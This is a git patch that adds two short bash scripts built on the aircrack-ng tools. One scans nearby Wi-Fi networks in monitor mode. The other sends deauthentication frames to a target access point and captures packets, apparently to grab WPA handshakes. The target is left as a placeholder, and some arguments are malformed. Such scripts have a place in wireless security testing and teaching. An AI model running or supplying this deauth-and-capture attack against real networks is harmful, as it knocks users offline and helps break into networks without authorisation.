From 1f0593bb6a3ba2792d8648176978fa68e2d953b2 Mon Sep 17 00:00:00 2001 From: "Martin Collins (colli168)" Date: Mon, 29 Mar 2021 15:22:44 +0100 Subject: [PATCH] Add files via upload Uploaded scripts --- scouting.sh | 5 +++++ sniffing.sh | 5 +++++ 2 files changed, 10 insertions(+) create mode 100644 scouting.sh create mode 100644 sniffing.sh diff --git a/scouting.sh b/scouting.sh new file mode 100644 index 0000000..ff74060 --- /dev/null +++ b/scouting.sh @@ -0,0 +1,5 @@ +#!/usr/bin/bash +airmon-ng start wlan1 6 +timeout 30 airodump-ng --write networks --output-format csv wlan1mon +airmon-ng stop wlan1mon +systemctl start NetworkManager \ No newline at end of file diff --git a/sniffing.sh b/sniffing.sh new file mode 100644 index 0000000..a5897a9 --- /dev/null +++ b/sniffing.sh @@ -0,0 +1,5 @@ +#!/usr/bin/bash +airmon-ng start wlan1 6 +aireplay-ng --deauth 5 -a [Network SSID here] wlan1mon && timeout 75s airodump-ng -c --bssid [Network SSID here] -w packets wlan1mon +airmon-ng stop wlan1mon +reboot \ No newline at end of file